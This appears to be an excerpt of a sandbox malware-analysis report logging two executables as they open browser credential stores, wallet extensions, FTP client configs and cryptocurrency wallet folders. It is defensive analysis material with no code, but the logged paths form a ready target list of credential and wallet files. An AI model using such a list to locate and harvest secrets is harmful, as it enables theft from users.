Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
